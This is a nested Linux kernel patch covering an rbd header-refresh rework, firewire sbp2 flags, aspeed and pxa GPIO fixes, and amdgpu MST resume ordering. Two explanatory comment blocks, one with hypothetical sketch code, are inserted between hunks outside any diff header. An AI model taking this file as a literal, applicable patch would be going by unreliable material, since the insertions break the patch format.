++				  struct rbd_image_header *header,
++				  bool first_time)
+ {
+ 	struct rbd_image_header_ondisk *ondisk = NULL;
+ 	u32 snap_count = 0;
+@@ -4908,7 +4913,7 @@ static int rbd_dev_v1_header_info(struct rbd_device *rbd_dev)
+ 		snap_count = le32_to_cpu(ondisk->snap_count);
+ 	} while (snap_count != want_count);
+ 
+-	ret = rbd_header_from_disk(rbd_dev, ondisk);
++	ret = rbd_header_from_disk(header, ondisk, first_time);
+ out:
+ 	kfree(ondisk);
+ 
+@@ -4932,39 +4937,6 @@ static void rbd_dev_update_size(struct rbd_device *rbd_dev)
+ 	}
+ }
+ 
+-static int rbd_dev_refresh(struct rbd_device *rbd_dev)
+-{
+-	u64 mapping_size;
+-	int ret;
+-
+-	down_write(&rbd_dev->header_rwsem);
+-	mapping_size = rbd_dev->mapping.size;
+-
+-	ret = rbd_dev_header_info(rbd_dev);
+-	if (ret)
+-		goto out;
+-
+-	/*
+-	 * If there is a parent, see if it has disappeared due to the
+-	 * mapped image getting flattened.
+-	 */
+-	if (rbd_dev->parent) {
+-		ret = rbd_dev_v2_parent_info(rbd_dev);
+-		if (ret)
+-			goto out;
+-	}
+-
+-	rbd_assert(!rbd_is_snap(rbd_dev));
+-	rbd_dev->mapping.size = rbd_dev->header.image_size;
+-
+-out:
+-	up_write(&rbd_dev->header_rwsem);
+-	if (!ret && mapping_size != rbd_dev->mapping.size)
+-		rbd_dev_update_size(rbd_dev);
+-
+-	return ret;
+-}
+-
+ static const struct blk_mq_ops rbd_mq_ops = {
+ 	.queue_rq	= rbd_queue_rq,
+ };
+@@ -5504,17 +5476,12 @@ static int _rbd_dev_v2_snap_size(struct rbd_device *rbd_dev, u64 snap_id,
+ 	return 0;
+ }
+ 
+-static int rbd_dev_v2_image_size(struct rbd_device *rbd_dev)
+-{
+-	return _rbd_dev_v2_snap_size(rbd_dev, CEPH_NOSNAP,
+-					&rbd_dev->header.obj_order,
+-					&rbd_dev->header.image_size);
+-}
+-
+-static int rbd_dev_v2_object_prefix(struct rbd_device *rbd_dev)
++static int rbd_dev_v2_object_prefix(struct rbd_device *rbd_dev,
++				    char **pobject_prefix)
+ {
+ 	size_t size;
+ 	void *reply_buf;
++	char *object_prefix;
+ 	int ret;
+ 	void *p;
+ 
+@@ -5532,16 +5499,16 @@ static int rbd_dev_v2_object_prefix(struct rbd_device *rbd_dev)
+ 		goto out;
+ 
+ 	p = reply_buf;
+-	rbd_dev->header.object_prefix = ceph_extract_encoded_string(&p,
+-						p + ret, NULL, GFP_NOIO);
++	object_prefix = ceph_extract_encoded_string(&p, p + ret, NULL,
++						    GFP_NOIO);
++	if (IS_ERR(object_prefix)) {
++		ret = PTR_ERR(object_prefix);
++		goto out;
++	}
+ 	ret = 0;
+ 
+-	if (IS_ERR(rbd_dev->header.object_prefix)) {
+-		ret = PTR_ERR(rbd_dev->header.object_prefix);
+-		rbd_dev->header.object_prefix = NULL;
+-	} else {
+-		dout("  object_prefix = %s\n", rbd_dev->header.object_prefix);
+-	}
++	*pobject_prefix = object_prefix;
++	dout("  object_prefix = %s\n", object_prefix);
+ out:
+ 	kfree(reply_buf);
+ 
+@@ -5592,13 +5559,6 @@ static int _rbd_dev_v2_snap_features(struct rbd_device *rbd_dev, u64 snap_id,
+ 	return 0;
+ }
+ 
+-static int rbd_dev_v2_features(struct rbd_device *rbd_dev)
+-{
+-	return _rbd_dev_v2_snap_features(rbd_dev, CEPH_NOSNAP,
+-					 rbd_is_ro(rbd_dev),
+-					 &rbd_dev->header.features);
+-}
+-
+ /*
+  * These are generic image flags, but since they are used only for
+  * object map, store them in rbd_dev->object_map_flags.
+@@ -5635,6 +5595,14 @@ struct parent_image_info {
+ 	u64		overlap;
+ };
+ 
++static void rbd_parent_info_cleanup(struct parent_image_info *pii)
++{
++	kfree(pii->pool_ns);
++	kfree(pii->image_id);
++
++	memset(pii, 0, sizeof(*pii));
++}
++
+ /*
+  * The caller is responsible for @pii.
+  */
+@@ -5704,6 +5672,9 @@ static int __get_parent_info(struct rbd_device *rbd_dev,
+ 	if (pii->has_overlap)
+ 		ceph_decode_64_safe(&p, end, pii->overlap, e_inval);
+ 
++	dout("%s pool_id %llu pool_ns %s image_id %s snap_id %llu has_overlap %d overlap %llu\n",
++	     __func__, pii->pool_id, pii->pool_ns, pii->image_id, pii->snap_id,
++	     pii->has_overlap, pii->overlap);
+ 	return 0;
+ 
+ e_inval:
+@@ -5742,14 +5713,17 @@ static int __get_parent_info_legacy(struct rbd_device *rbd_dev,
+ 	pii->has_overlap = true;
+ 	ceph_decode_64_safe(&p, end, pii->overlap, e_inval);
+ 
++	dout("%s pool_id %llu pool_ns %s image_id %s snap_id %llu has_overlap %d overlap %llu\n",
++	     __func__, pii->pool_id, pii->pool_ns, pii->image_id, pii->snap_id,
++	     pii->has_overlap, pii->overlap);
+ 	return 0;
+ 
+ e_inval:
+ 	return -EINVAL;
+ }
+ 
+-static int get_parent_info(struct rbd_device *rbd_dev,
+-			   struct parent_image_info *pii)
++static int rbd_dev_v2_parent_info(struct rbd_device *rbd_dev,
++				  struct parent_image_info *pii)
+ {
+ 	struct page *req_page, *reply_page;
+ 	void *p;
+@@ -5777,7 +5751,7 @@ static int get_parent_info(struct rbd_device *rbd_dev,
+ 	return ret;
+ }
+ 
+-static int rbd_dev_v2_parent_info(struct rbd_device *rbd_dev)
++static int rbd_dev_setup_parent(struct rbd_device *rbd_dev)
+ {
+ 	struct rbd_spec *parent_spec;
+ 	struct parent_image_info pii = { 0 };
+@@ -5787,37 +5761,12 @@ static int rbd_dev_v2_parent_info(struct rbd_device *rbd_dev)
+ 	if (!parent_spec)
+ 		return -ENOMEM;
+ 
+-	ret = get_parent_info(rbd_dev, &pii);
++	ret = rbd_dev_v2_parent_info(rbd_dev, &pii);
+ 	if (ret)
+ 		goto out_err;
+ 
+-	dout("%s pool_id %llu pool_ns %s image_id %s snap_id %llu has_overlap %d overlap %llu\n",
+-	     __func__, pii.pool_id, pii.pool_ns, pii.image_id, pii.snap_id,
+-	     pii.has_overlap, pii.overlap);
+-
+-	if (pii.pool_id == CEPH_NOPOOL || !pii.has_overlap) {
+-		/*
+-		 * Either the parent never existed, or we have
+-		 * record of it but the image got flattened so it no
+-		 * longer has a parent.  When the parent of a
+-		 * layered image disappears we immediately set the
+-		 * overlap to 0.  The effect of this is that all new
+-		 * requests will be treated as if the image had no
+-		 * parent.
+-		 *
+-		 * If !pii.has_overlap, the parent image spec is not
+-		 * applicable.  It's there to avoid duplication in each
+-		 * snapshot record.
+-		 */
+-		if (rbd_dev->parent_overlap) {
+-			rbd_dev->parent_overlap = 0;
+-			rbd_dev_parent_put(rbd_dev);
+-			pr_info("%s: clone image has been flattened\n",
+-				rbd_dev->disk->disk_name);
+-		}
+-
++	if (pii.pool_id == CEPH_NOPOOL || !pii.has_overlap)
+ 		goto out;	/* No parent?  No problem. */
+-	}
+ 
+ 	/* The ceph file layout needs to fit pool id in 32 bits */
+ 
+@@ -5829,58 +5778,46 @@ static int rbd_dev_v2_parent_info(struct rbd_device *rbd_dev)
+ 	}
+ 
+ 	/*
+-	 * The parent won't change (except when the clone is
+-	 * flattened, already handled that).  So we only need to
+-	 * record the parent spec we have not already done so.
++	 * The parent won't change except when the clone is flattened,
++	 * so we only need to record the parent image spec once.
+ 	 */
+-	if (!rbd_dev->parent_spec) {
+-		parent_spec->pool_id = pii.pool_id;
+-		if (pii.pool_ns && *pii.pool_ns) {
+-			parent_spec->pool_ns = pii.pool_ns;
+-			pii.pool_ns = NULL;
+-		}
+-		parent_spec->image_id = pii.image_id;
+-		pii.image_id = NULL;
+-		parent_spec->snap_id = pii.snap_id;
+-
+-		rbd_dev->parent_spec = parent_spec;
+-		parent_spec = NULL;	/* rbd_dev now owns this */
++	parent_spec->pool_id = pii.pool_id;
++	if (pii.pool_ns && *pii.pool_ns) {
++		parent_spec->pool_ns = pii.pool_ns;
++		pii.pool_ns = NULL;
+ 	}
++	parent_spec->image_id = pii.image_id;
++	pii.image_id = NULL;
++	parent_spec->snap_id = pii.snap_id;
++
++	rbd_assert(!rbd_dev->parent_spec);
++	rbd_dev->parent_spec = parent_spec;
++	parent_spec = NULL;	/* rbd_dev now owns this */
+ 
+ 	/*
+-	 * We always update the parent overlap.  If it's zero we issue
+-	 * a warning, as we will proceed as if there was no parent.
++	 * Record the parent overlap.  If it's zero, issue a warning as
++	 * we will proceed as if there is no parent.
+ 	 */
+-	if (!pii.overlap) {
+-		if (parent_spec) {
+-			/* refresh, careful to warn just once */
+-			if (rbd_dev->parent_overlap)
+-				rbd_warn(rbd_dev,
+-				    "clone now standalone (overlap became 0)");
+-		} else {
+-			/* initial probe */
+-			rbd_warn(rbd_dev, "clone is standalone (overlap 0)");
+-		}
+-	}
++	if (!pii.overlap)
++		rbd_warn(rbd_dev, "clone is standalone (overlap 0)");
+ 	rbd_dev->parent_overlap = pii.overlap;
+ 
+ out:
+ 	ret = 0;
+ out_err:
+-	kfree(pii.pool_ns);
+-	kfree(pii.image_id);
++	rbd_parent_info_cleanup(&pii);
+ 	rbd_spec_put(parent_spec);
+ 	return ret;
+ }
+ 
+-static int rbd_dev_v2_striping_info(struct rbd_device *rbd_dev)
++static int rbd_dev_v2_striping_info(struct rbd_device *rbd_dev,
++				    u64 *stripe_unit, u64 *stripe_count)
+ {
+ 	struct {
+ 		__le64 stripe_unit;
+ 		__le64 stripe_count;
+ 	} __attribute__ ((packed)) striping_info_buf = { 0 };
+ 	size_t size = sizeof (striping_info_buf);
+-	void *p;
+ 	int ret;
+ 
+ 	ret = rbd_obj_method_sync(rbd_dev, &rbd_dev->header_oid,
+@@ -5892,27 +5829,33 @@ static int rbd_dev_v2_striping_info(struct rbd_device *rbd_dev)
+ 	if (ret < size)
+ 		return -ERANGE;
+ 
+-	p = &striping_info_buf;
+-	rbd_dev->header.stripe_unit = ceph_decode_64(&p);
+-	rbd_dev->header.stripe_count = ceph_decode_64(&p);
++	*stripe_unit = le64_to_cpu(striping_info_buf.stripe_unit);
++	*stripe_count = le64_to_cpu(striping_info_buf.stripe_count);
++	dout("  stripe_unit = %llu stripe_count = %llu\n", *stripe_unit,
++	     *stripe_count);
++
+ 	return 0;
+ }
+ 
+-static int rbd_dev_v2_data_pool(struct rbd_device *rbd_dev)
++static int rbd_dev_v2_data_pool(struct rbd_device *rbd_dev, s64 *data_pool_id)
+ {
+-	__le64 data_pool_id;
++	__le64 data_pool_buf;
+ 	int ret;
+ 
+ 	ret = rbd_obj_method_sync(rbd_dev, &rbd_dev->header_oid,
+ 				  &rbd_dev->header_oloc, "get_data_pool",
+-				  NULL, 0, &data_pool_id, sizeof(data_pool_id));
++				  NULL, 0, &data_pool_buf,
++				  sizeof(data_pool_buf));
++	dout("%s: rbd_obj_method_sync returned %d\n", __func__, ret);
+ 	if (ret < 0)
+ 		return ret;
+-	if (ret < sizeof(data_pool_id))
++	if (ret < sizeof(data_pool_buf))
+ 		return -EBADMSG;
+ 
+-	rbd_dev->header.data_pool_id = le64_to_cpu(data_pool_id);
+-	WARN_ON(rbd_dev->header.data_pool_id == CEPH_NOPOOL);
++	*data_pool_id = le64_to_cpu(data_pool_buf);
++	dout("  data_pool_id = %lld\n", *data_pool_id);
++	WARN_ON(*data_pool_id == CEPH_NOPOOL);
++
+ 	return 0;
+ }
+ 
+@@ -6104,7 +6047,8 @@ out_err:
+ 	return ret;
+ }
+ 
+-static int rbd_dev_v2_snap_context(struct rbd_device *rbd_dev)
++static int rbd_dev_v2_snap_context(struct rbd_device *rbd_dev,
++				   struct ceph_snap_context **psnapc)
+ {
+ 	size_t size;
+ 	int ret;
+@@ -6165,9 +6109,7 @@ static int rbd_dev_v2_snap_context(struct rbd_device *rbd_dev)
+ 	for (i = 0; i < snap_count; i++)
+ 		snapc->snaps[i] = ceph_decode_64(&p);
+ 
+-	ceph_put_snap_context(rbd_dev->header.snapc);
+-	rbd_dev->header.snapc = snapc;
+-
++	*psnapc = snapc;
+ 	dout("  snap context seq = %llu, snap_count = %u\n",
+ 		(unsigned long long)seq, (unsigned int)snap_count);
+ out:
+@@ -6216,38 +6158,42 @@ out:
+ 	return snap_name;
+ }
+ 
+-static int rbd_dev_v2_header_info(struct rbd_device *rbd_dev)
++static int rbd_dev_v2_header_info(struct rbd_device *rbd_dev,
++				  struct rbd_image_header *header,
++				  bool first_time)
+ {
+-	bool first_time = rbd_dev->header.object_prefix == NULL;
+ 	int ret;
+ 
+-	ret = rbd_dev_v2_image_size(rbd_dev);
++	ret = _rbd_dev_v2_snap_size(rbd_dev, CEPH_NOSNAP,
++				    first_time ? &header->obj_order : NULL,
++				    &header->image_size);
+ 	if (ret)
+ 		return ret;
+ 
+ 	if (first_time) {
+-		ret = rbd_dev_v2_header_onetime(rbd_dev);
++		ret = rbd_dev_v2_header_onetime(rbd_dev, header);
+ 		if (ret)
+ 			return ret;
+ 	}
+ 
+-	ret = rbd_dev_v2_snap_context(rbd_dev);
+-	if (ret && first_time) {
+-		kfree(rbd_dev->header.object_prefix);
+-		rbd_dev->header.object_prefix = NULL;
+-	}
++	ret = rbd_dev_v2_snap_context(rbd_dev, &header->snapc);
++	if (ret)
++		return ret;
+ 
+-	return ret;
++	return 0;
+ }
+ 
+-static int rbd_dev_header_info(struct rbd_device *rbd_dev)
++static int rbd_dev_header_info(struct rbd_device *rbd_dev,
++			       struct rbd_image_header *header,
++			       bool first_time)
+ {
+ 	rbd_assert(rbd_image_format_valid(rbd_dev->image_format));
++	rbd_assert(!header->object_prefix && !header->snapc);
+ 
+ 	if (rbd_dev->image_format == 1)
+-		return rbd_dev_v1_header_info(rbd_dev);
++		return rbd_dev_v1_header_info(rbd_dev, header, first_time);
+ 
+-	return rbd_dev_v2_header_info(rbd_dev);
++	return rbd_dev_v2_header_info(rbd_dev, header, first_time);
+ }
+ 
+ /*
+@@ -6735,60 +6681,49 @@ out:
+  */
+ static void rbd_dev_unprobe(struct rbd_device *rbd_dev)
+ {
+-	struct rbd_image_header	*header;
+-
+ 	rbd_dev_parent_put(rbd_dev);
+ 	rbd_object_map_free(rbd_dev);
+ 	rbd_dev_mapping_clear(rbd_dev);
+ 
+ 	/* Free dynamic fields from the header, then zero it out */
+ 
+-	header = &rbd_dev->header;
+-	ceph_put_snap_context(header->snapc);
+-	kfree(header->snap_sizes);
+-	kfree(header->snap_names);
+-	kfree(header->object_prefix);
+-	memset(header, 0, sizeof (*header));
++	rbd_image_header_cleanup(&rbd_dev->header);
+ }
+ 
+-static int rbd_dev_v2_header_onetime(struct rbd_device *rbd_dev)
++static int rbd_dev_v2_header_onetime(struct rbd_device *rbd_dev,
++				     struct rbd_image_header *header)
+ {
+ 	int ret;
+ 
+-	ret = rbd_dev_v2_object_prefix(rbd_dev);
++	ret = rbd_dev_v2_object_prefix(rbd_dev, &header->object_prefix);
+ 	if (ret)
+-		goto out_err;
++		return ret;
+ 
+ 	/*
+ 	 * Get and check the features for the image.  Currently the
+ 	 * features are assumed to never change.
+ 	 */
+-	ret = rbd_dev_v2_features(rbd_dev);
++	ret = _rbd_dev_v2_snap_features(rbd_dev, CEPH_NOSNAP,
++					rbd_is_ro(rbd_dev), &header->features);
+ 	if (ret)
+-		goto out_err;
++		return ret;
+ 
+ 	/* If the image supports fancy striping, get its parameters */
+ 
+-	if (rbd_dev->header.features & RBD_FEATURE_STRIPINGV2) {
+-		ret = rbd_dev_v2_striping_info(rbd_dev);
+-		if (ret < 0)
+-			goto out_err;
++	if (header->features & RBD_FEATURE_STRIPINGV2) {
++		ret = rbd_dev_v2_striping_info(rbd_dev, &header->stripe_unit,
++					       &header->stripe_count);
++		if (ret)
++			return ret;
+ 	}
+ 
+-	if (rbd_dev->header.features & RBD_FEATURE_DATA_POOL) {
+-		ret = rbd_dev_v2_data_pool(rbd_dev);
++	if (header->features & RBD_FEATURE_DATA_POOL) {
++		ret = rbd_dev_v2_data_pool(rbd_dev, &header->data_pool_id);
+ 		if (ret)
+-			goto out_err;
++			return ret;
+ 	}
+ 
+-	rbd_init_layout(rbd_dev);
+ 	return 0;
+-
+-out_err:
+-	rbd_dev->header.features = 0;
+-	kfree(rbd_dev->header.object_prefix);
+-	rbd_dev->header.object_prefix = NULL;
+-	return ret;
+ }
+ 
+ /*
+@@ -6983,13 +6918,15 @@ static int rbd_dev_image_probe(struct rbd_device *rbd_dev, int depth)
+ 	if (!depth)
+ 		down_write(&rbd_dev->header_rwsem);
+ 
+-	ret = rbd_dev_header_info(rbd_dev);
++	ret = rbd_dev_header_info(rbd_dev, &rbd_dev->header, true);
+ 	if (ret) {
+ 		if (ret == -ENOENT && !need_watch)
+ 			rbd_print_dne(rbd_dev, false);
+ 		goto err_out_probe;
+ 	}
+ 
++	rbd_init_layout(rbd_dev);
++
+ 	/*
+ 	 * If this image is the one being mapped, we have pool name and
+ 	 * id, image name and id, and snap name - need to fill snap id.
+@@ -7018,7 +6955,7 @@ static int rbd_dev_image_probe(struct rbd_device *rbd_dev, int depth)
+ 	}
+ 
+ 	if (rbd_dev->header.features & RBD_FEATURE_LAYERING) {
+-		ret = rbd_dev_v2_parent_info(rbd_dev);
++		ret = rbd_dev_setup_parent(rbd_dev);
+ 		if (ret)
+ 			goto err_out_probe;
+ 	}
+@@ -7044,6 +6981,107 @@ err_out_format:
+ 	return ret;
+ }
+ 
++static void rbd_dev_update_header(struct rbd_device *rbd_dev,
++				  struct rbd_image_header *header)
++{
++	rbd_assert(rbd_image_format_valid(rbd_dev->image_format));
++	rbd_assert(rbd_dev->header.object_prefix); /* !first_time */
++
++	if (rbd_dev->header.image_size != header->image_size) {
++		rbd_dev->header.image_size = header->image_size;
++
++		if (!rbd_is_snap(rbd_dev)) {
++			rbd_dev->mapping.size = header->image_size;
++			rbd_dev_update_size(rbd_dev);
++		}
++	}
++
++	ceph_put_snap_context(rbd_dev->header.snapc);
++	rbd_dev->header.snapc = header->snapc;
++	header->snapc = NULL;
++
++	if (rbd_dev->image_format == 1) {
++		kfree(rbd_dev->header.snap_names);
++		rbd_dev->header.snap_names = header->snap_names;
++		header->snap_names = NULL;
++
++		kfree(rbd_dev->header.snap_sizes);
++		rbd_dev->header.snap_sizes = header->snap_sizes;
++		header->snap_sizes = NULL;
++	}
++}
++
++static void rbd_dev_update_parent(struct rbd_device *rbd_dev,
++				  struct parent_image_info *pii)
++{
++	if (pii->pool_id == CEPH_NOPOOL || !pii->has_overlap) {
++		/*
++		 * Either the parent never existed, or we have
++		 * record of it but the image got flattened so it no
++		 * longer has a parent.  When the parent of a
++		 * layered image disappears we immediately set the
++		 * overlap to 0.  The effect of this is that all new
++		 * requests will be treated as if the image had no
++		 * parent.
++		 *
++		 * If !pii.has_overlap, the parent image spec is not
++		 * applicable.  It's there to avoid duplication in each
++		 * snapshot record.
++		 */
++		if (rbd_dev->parent_overlap) {
++			rbd_dev->parent_overlap = 0;
++			rbd_dev_parent_put(rbd_dev);
++			pr_info("%s: clone has been flattened\n",
++				rbd_dev->disk->disk_name);
++		}
++	} else {
++		rbd_assert(rbd_dev->parent_spec);
++
++		/*
++		 * Update the parent overlap.  If it became zero, issue
++		 * a warning as we will proceed as if there is no parent.
++		 */
++		if (!pii->overlap && rbd_dev->parent_overlap)
++			rbd_warn(rbd_dev,
++				 "clone has become standalone (overlap 0)");
++		rbd_dev->parent_overlap = pii->overlap;
++	}
++}
++
++static int rbd_dev_refresh(struct rbd_device *rbd_dev)
++{
++	struct rbd_image_header	header = { 0 };
++	struct parent_image_info pii = { 0 };
++	int ret;
++
++	dout("%s rbd_dev %p\n", __func__, rbd_dev);
++
++	ret = rbd_dev_header_info(rbd_dev, &header, false);
++	if (ret)
++		goto out;
++
++	/*
++	 * If there is a parent, see if it has disappeared due to the
++	 * mapped image getting flattened.
++	 */
++	if (rbd_dev->parent) {
++		ret = rbd_dev_v2_parent_info(rbd_dev, &pii);
++		if (ret)
++			goto out;
++	}
++
++	down_write(&rbd_dev->header_rwsem);
++	rbd_dev_update_header(rbd_dev, &header);
++	if (rbd_dev->parent)
++		rbd_dev_update_parent(rbd_dev, &pii);
++	up_write(&rbd_dev->header_rwsem);
++
++out:
++	rbd_parent_info_cleanup(&pii);
++	rbd_image_header_cleanup(&header);
++	return ret;
++}
++
+ static ssize_t do_rbd_add(struct bus_type *bus,
+ 			  const char *buf,
+ 			  size_t count)
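+/*
+ * Illustrative sketch, not part of the patch above: the rbd rework
+ * builds the refreshed header into a local struct and swaps it into the
+ * device only under the rwsem, so a failed fetch can no longer leave
+ * the live header half-updated. All names below are hypothetical.
+ */
+#include <linux/rwsem.h>
+#include <linux/minmax.h>
+
+struct sketch_hdr { char *name; };
+struct sketch_dev { struct rw_semaphore lock; struct sketch_hdr hdr; };
+
+static int sketch_fetch_hdr(struct sketch_dev *d, struct sketch_hdr *h);
+static void sketch_free_hdr(struct sketch_hdr *h);
+
+static int sketch_refresh(struct sketch_dev *d)
+{
+	struct sketch_hdr next = { 0 };
+	int ret;
+
+	ret = sketch_fetch_hdr(d, &next);	/* slow I/O, no lock held */
+	if (ret)
+		goto out;
+
+	down_write(&d->lock);
+	swap(d->hdr, next);			/* short and cannot fail */
+	up_write(&d->lock);
+out:
+	sketch_free_hdr(&next);			/* old fields or fetch leftovers */
+	return ret;
+}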
+diff --git a/drivers/firewire/sbp2.c b/drivers/firewire/sbp2.c
+index 60051c0cabeaa..e322a326546b5 100644
+--- a/drivers/firewire/sbp2.c
++++ b/drivers/firewire/sbp2.c
+@@ -81,7 +81,8 @@ MODULE_PARM_DESC(exclusive_login, "Exclusive login to sbp2 device "
+  *
+  * - power condition
+  *   Set the power condition field in the START STOP UNIT commands sent by
+- *   sd_mod on suspend, resume, and shutdown (if manage_start_stop is on).
++ *   sd_mod on suspend, resume, and shutdown (if manage_system_start_stop or
++ *   manage_runtime_start_stop is on).
+  *   Some disks need this to spin down or to resume properly.
+  *
+  * - override internal blacklist
+@@ -1517,8 +1518,10 @@ static int sbp2_scsi_slave_configure(struct scsi_device *sdev)
+ 
+ 	sdev->use_10_for_rw = 1;
+ 
+-	if (sbp2_param_exclusive_login)
+-		sdev->manage_start_stop = 1;
++	if (sbp2_param_exclusive_login) {
++		sdev->manage_system_start_stop = true;
++		sdev->manage_runtime_start_stop = true;
++	}
+ 
+ 	if (sdev->type == TYPE_ROM)
+ 		sdev->use_10_for_ms = 1;
+diff --git a/drivers/gpio/gpio-aspeed.c b/drivers/gpio/gpio-aspeed.c
+index 318a7d95a1a8b..42d3e1cf73528 100644
+--- a/drivers/gpio/gpio-aspeed.c
++++ b/drivers/gpio/gpio-aspeed.c
+@@ -963,7 +963,7 @@ static int aspeed_gpio_set_config(struct gpio_chip *chip, unsigned int offset,
+ 	else if (param == PIN_CONFIG_BIAS_DISABLE ||
+ 			param == PIN_CONFIG_BIAS_PULL_DOWN ||
+ 			param == PIN_CONFIG_DRIVE_STRENGTH)
+-		return pinctrl_gpio_set_config(offset, config);
++		return pinctrl_gpio_set_config(chip->base + offset, config);
+ 	else if (param == PIN_CONFIG_DRIVE_OPEN_DRAIN ||
+ 			param == PIN_CONFIG_DRIVE_OPEN_SOURCE)
+ 		/* Return -ENOTSUPP to trigger emulation, as per datasheet */
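+/*
+ * Illustrative note, not part of the patch above: in this kernel,
+ * pinctrl_gpio_set_config() takes a number in the global GPIO
+ * numberspace, while gpio_chip callbacks receive a chip-relative
+ * offset, hence the fix:
+ *
+ *	pinctrl_gpio_set_config(chip->base + offset, config);
+ *
+ * Passing the bare offset only works by accident on a chip whose base
+ * happens to be 0.
+ */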
+diff --git a/drivers/gpio/gpio-pxa.c b/drivers/gpio/gpio-pxa.c
+index 1198ab0305d03..b90357774dc04 100644
+--- a/drivers/gpio/gpio-pxa.c
++++ b/drivers/gpio/gpio-pxa.c
+@@ -243,6 +243,7 @@ static bool pxa_gpio_has_pinctrl(void)
+ 	switch (gpio_type) {
+ 	case PXA3XX_GPIO:
+ 	case MMP2_GPIO:
++	case MMP_GPIO:
+ 		return false;
+ 
+ 	default:
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 5f5999cea7d2c..92fa2faf63e41 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -2179,7 +2179,7 @@ static int amdgpu_device_ip_early_init(struct amdgpu_device *adev)
+ 		adev->flags |= AMD_IS_PX;
+ 
+ 	if (!(adev->flags & AMD_IS_APU)) {
+-		parent = pci_upstream_bridge(adev->pdev);
++		parent = pcie_find_root_port(adev->pdev);
+ 		adev->has_pr3 = parent ? pci_pr3_present(parent) : false;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 18274ff5082ad..339f1f5a08339 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2344,14 +2344,62 @@ static int dm_late_init(void *handle)
+ 	return detect_mst_link_for_all_connectors(adev_to_drm(adev));
+ }
+ 
++static void resume_mst_branch_status(struct drm_dp_mst_topology_mgr *mgr)
++{
++	int ret;
++	u8 guid[16];
++	u64 tmp64;
++
++	mutex_lock(&mgr->lock);
++	if (!mgr->mst_primary)
++		goto out_fail;
++
++	if (drm_dp_read_dpcd_caps(mgr->aux, mgr->dpcd) < 0) {
++		drm_dbg_kms(mgr->dev, "dpcd read failed - undocked during suspend?\n");
++		goto out_fail;
++	}
++
++	ret = drm_dp_dpcd_writeb(mgr->aux, DP_MSTM_CTRL,
++				 DP_MST_EN |
++				 DP_UP_REQ_EN |
++				 DP_UPSTREAM_IS_SRC);
++	if (ret < 0) {
++		drm_dbg_kms(mgr->dev, "mst write failed - undocked during suspend?\n");
++		goto out_fail;
++	}
++
++	/* Some hubs forget their guids after they resume */
++	ret = drm_dp_dpcd_read(mgr->aux, DP_GUID, guid, 16);
++	if (ret != 16) {
++		drm_dbg_kms(mgr->dev, "dpcd read failed - undocked during suspend?\n");
++		goto out_fail;
++	}
++
++	if (memchr_inv(guid, 0, 16) == NULL) {
++		tmp64 = get_jiffies_64();
++		memcpy(&guid[0], &tmp64, sizeof(u64));
++		memcpy(&guid[8], &tmp64, sizeof(u64));
++
++		ret = drm_dp_dpcd_write(mgr->aux, DP_GUID, guid, 16);
++
++		if (ret != 16) {
++			drm_dbg_kms(mgr->dev, "check mstb guid failed - undocked during suspend?\n");
++			goto out_fail;
++		}
++	}
++
++	memcpy(mgr->mst_primary->guid, guid, 16);
++
++out_fail:
++	mutex_unlock(&mgr->lock);
++}
++
+ static void s3_handle_mst(struct drm_device *dev, bool suspend)
+ {
+ 	struct amdgpu_dm_connector *aconnector;
+ 	struct drm_connector *connector;
+ 	struct drm_connector_list_iter iter;
+ 	struct drm_dp_mst_topology_mgr *mgr;
+-	int ret;
+-	bool need_hotplug = false;
+ 
+ 	drm_connector_list_iter_begin(dev, &iter);
+ 	drm_for_each_connector_iter(connector, &iter) {
+@@ -2373,18 +2421,15 @@ static void s3_handle_mst(struct drm_device *dev, bool suspend)
+ 			if (!dp_is_lttpr_present(aconnector->dc_link))
+ 				dc_link_aux_try_to_configure_timeout(aconnector->dc_link->ddc, LINK_AUX_DEFAULT_TIMEOUT_PERIOD);
+ 
+-			ret = drm_dp_mst_topology_mgr_resume(mgr, true);
+-			if (ret < 0) {
+-				dm_helpers_dp_mst_stop_top_mgr(aconnector->dc_link->ctx,
+-					aconnector->dc_link);
+-				need_hotplug = true;
+-			}
++			/* TODO: move resume_mst_branch_status() into drm mst resume again
++			 * once topology probing work is pulled out of mst resume into a
++			 * second mst resume step. That second step should run after the
++			 * old state has been restored (i.e. drm_atomic_helper_resume()).
++			 */
++			resume_mst_branch_status(mgr);
+ 		}
+ 	}
+ 	drm_connector_list_iter_end(&iter);
+-
+-	if (need_hotplug)
+-		drm_kms_helper_hotplug_event(dev);
+ }
+ 
+ static int amdgpu_dm_smu_write_watermarks_table(struct amdgpu_device *adev)
+@@ -2773,7 +2818,8 @@ static int dm_resume(void *handle)
+ 	struct dm_atomic_state *dm_state = to_dm_atomic_state(dm->atomic_obj.state);
+ 	enum dc_connection_type new_connection_type = dc_connection_none;
+ 	struct dc_state *dc_state;
+-	int i, r, j;
++	int i, r, j, ret;
++	bool need_hotplug = false;
+ 
+ 	if (amdgpu_in_reset(adev)) {
+ 		dc_state = dm->cached_dc_state;
+@@ -2871,7 +2917,7 @@ static int dm_resume(void *handle)
+ 			continue;
+ 
+ 		/*
+-		 * this is the case when traversing through already created
++		 * this is the case when traversing through already created end sink
+ 		 * MST connectors, should be skipped
+ 		 */
+ 		if (aconnector && aconnector->mst_port)
+@@ -2931,6 +2977,27 @@ static int dm_resume(void *handle)
+ 
+ 	dm->cached_state = NULL;
+ 
++	/* Do mst topology probing after resuming cached state */
++	drm_connector_list_iter_begin(ddev, &iter);
++	drm_for_each_connector_iter(connector, &iter) {
++		aconnector = to_amdgpu_dm_connector(connector);
++		if (aconnector->dc_link->type != dc_connection_mst_branch ||
++		    aconnector->mst_port)
++			continue;
++
++		ret = drm_dp_mst_topology_mgr_resume(&aconnector->mst_mgr, true);
++
++		if (ret < 0) {
++			dm_helpers_dp_mst_stop_top_mgr(aconnector->dc_link->ctx,
++					aconnector->dc_link);
++			need_hotplug = true;
++		}
++	}
++	drm_connector_list_iter_end(&iter);
++
++	if (need_hotplug)
++		drm_kms_helper_hotplug_event(ddev);
++
+ 	amdgpu_dm_irq_resume_late(adev);
+ 
